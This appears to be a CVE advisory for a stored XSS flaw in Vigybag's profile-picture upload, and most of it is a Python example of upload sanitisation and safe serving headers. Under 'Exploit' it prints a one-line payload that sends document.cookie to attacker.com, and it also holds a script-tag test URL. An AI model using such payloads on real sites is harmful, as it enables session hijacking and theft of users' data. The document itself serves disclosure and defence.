Vigybag, Cross-Site Scripting (XSS), CVE-2025-45002 (Medium)


How the CVE Works

CVE-2025-45002 is a stored Cross-Site Scripting (XSS) vulnerability in Vigybag v1.0 and earlier. The flaw exists in the profile picture upload function under “My Profile,” where user-supplied input is not properly sanitized. An attacker can upload a malicious image file containing embedded JavaScript code. When another user views the attacker’s profile, the script executes in that user’s browser, allowing session hijacking, defacement, or malware delivery. The payload persists because the server does not properly validate the uploaded file’s metadata and content.

DailyCVE Form

Platform: Vigybag
Version: v1.0 and prior
Vulnerability: Stored XSS
Severity: Medium
Date: 06/23/2025

Prediction: Patch by 07/15/2025

What Undercode Says

Analytics:

curl -X GET "http://example.com/profile?user=<script>alert(1)</script>"
grep -r "unsafe_html" /var/www/vigybag/

Exploit:

<img src="x" onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">

Protection from this CVE:

  • Sanitize file upload metadata.
  • Implement CSP headers.
  • Patch to v1.1.
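The advisory above names the two root causes (a file that is not really an image, or script text carried in image metadata) and the two generic fixes (sanitize upload metadata, send CSP headers). The following is an added example of what those fixes look like server-side; it is not Vigybag’s code, and the function names, the constructed sample files and the header values are assumptions for illustration. It accepts only PNG and JPEG by magic bytes, re-emits the image without its metadata chunks/segments (and without any bytes appended after the end marker), rejects SVG/HTML regardless of extension, and returns the response headers the picture-serving route should use so the browser can never treat the bytes as HTML.

```python
"""Hardened profile-picture upload handling (added example, stdlib only)."""
import struct
import zlib
from typing import Dict, Optional, Tuple

PNG_SIG = b"\x89PNG\r\n\x1a\n"
PNG_META = {b"tEXt", b"zTXt", b"iTXt", b"eXIf"}   # metadata chunks never re-served


def sniff(data: bytes) -> Optional[str]:
    """Type comes from magic bytes, never from the filename or client MIME type."""
    if data.startswith(PNG_SIG):
        return "image/png"
    if data.startswith(b"\xff\xd8\xff"):
        return "image/jpeg"
    return None          # SVG, HTML, anything else: rejected by the caller


def strip_png(data: bytes) -> bytes:
    """Copy only non-metadata chunks (CRC-checked); stop at IEND."""
    out, pos = bytearray(PNG_SIG), len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length              # length + type + data + crc
        if end > len(data):
            raise ValueError("truncated PNG chunk")
        chunk = data[pos:end]
        if ctype not in PNG_META:
            if zlib.crc32(chunk[4:-4]) & 0xFFFFFFFF != struct.unpack(">I", chunk[-4:])[0]:
                raise ValueError("bad CRC on %r" % ctype)
            out += chunk
        pos = end
        if ctype == b"IEND":
            return bytes(out)                # anything after IEND (polyglot tails) is dropped
    raise ValueError("PNG without IEND")


def strip_jpeg(data: bytes) -> bytes:
    """Drop APP1..APP15 (EXIF/XMP) and COM segments; keep APP0 and the scan data."""
    out, pos = bytearray(b"\xff\xd8"), 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("JPEG marker expected")
        marker = data[pos + 1]
        if marker == 0xDA:                   # SOS: copy entropy-coded data through EOI only
            eoi = data.rfind(b"\xff\xd9")
            if eoi < pos:
                raise ValueError("JPEG without EOI")
            return bytes(out + data[pos:eoi + 2])
        seglen = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        seg = data[pos:pos + 2 + seglen]
        if len(seg) != 2 + seglen:
            raise ValueError("truncated JPEG segment")
        if not (0xE1 <= marker <= 0xEF or marker == 0xFE):
            out += seg
        pos += 2 + seglen
    raise ValueError("JPEG without SOS")


def validate_upload(filename: str, data: bytes, max_bytes: int = 2_000_000) -> Tuple[str, bytes]:
    """Return (content_type, cleaned_bytes) for a safe file, else raise ValueError."""
    if len(data) > max_bytes:
        raise ValueError("file too large")
    ctype = sniff(data)
    if ctype is None:
        raise ValueError("not a PNG or JPEG")
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in {"image/png": {"png"}, "image/jpeg": {"jpg", "jpeg"}}[ctype]:
        raise ValueError("extension does not match content")
    return ctype, (strip_png(data) if ctype == "image/png" else strip_jpeg(data))


def serve_headers(content_type: str) -> Dict[str, str]:
    """Headers for the route serving stored pictures (assumed values): the browser
    must treat the bytes as an image only, even if a check above were bypassed."""
    return {
        "Content-Type": content_type,
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
        "Cache-Control": "private, max-age=3600",
    }


def _png_chunk(ctype: bytes, body: bytes) -> bytes:
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body) & 0xFFFFFFFF)


# Constructed samples (not real artefacts from the advisory):
# a 1x1 PNG with script text in a tEXt chunk and an HTML tail appended after IEND,
# a JPEG skeleton with script text in a COM segment, and an SVG carrying an event handler.
SAMPLE_PNG = (PNG_SIG
              + _png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
              + _png_chunk(b"tEXt", b"Comment\x00<script>alert(1)</script>")
              + _png_chunk(b"IDAT", zlib.compress(b"\x00\x00\x00\x00"))
              + _png_chunk(b"IEND", b"")
              + b"<html>appended tail</html>")
_COM = b"<script>alert(1)</script>"
SAMPLE_JPEG = (b"\xff\xd8"
               + b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
               + b"\xff\xfe" + struct.pack(">H", 2 + len(_COM)) + _COM
               + b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00" + b"\x00\x00"
               + b"\xff\xd9")
SAMPLE_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>'

if __name__ == "__main__":
    for name, blob in (("avatar.png", SAMPLE_PNG), ("avatar.jpg", SAMPLE_JPEG), ("avatar.png", SAMPLE_SVG)):
        try:
            ctype, cleaned = validate_upload(name, blob)
            print(name, "accepted as", ctype, "-", len(blob), "->", len(cleaned), "bytes")
        except ValueError as exc:
            print(name, "rejected:", exc)
```

Re-encoding through an image library (decode, then write a fresh file) is the stronger form of the same idea and also defeats payloads hidden in pixel data; the chunk-level stripping above is what you can do without a decoder. The `sandbox` CSP directive and `nosniff` on the serving route are the cheap second layer: even if a non-image slips through, it is not executed as a document in the site’s origin.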

Impact:

  • Session hijacking.
  • Unauthorized actions.
  • Data theft.

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
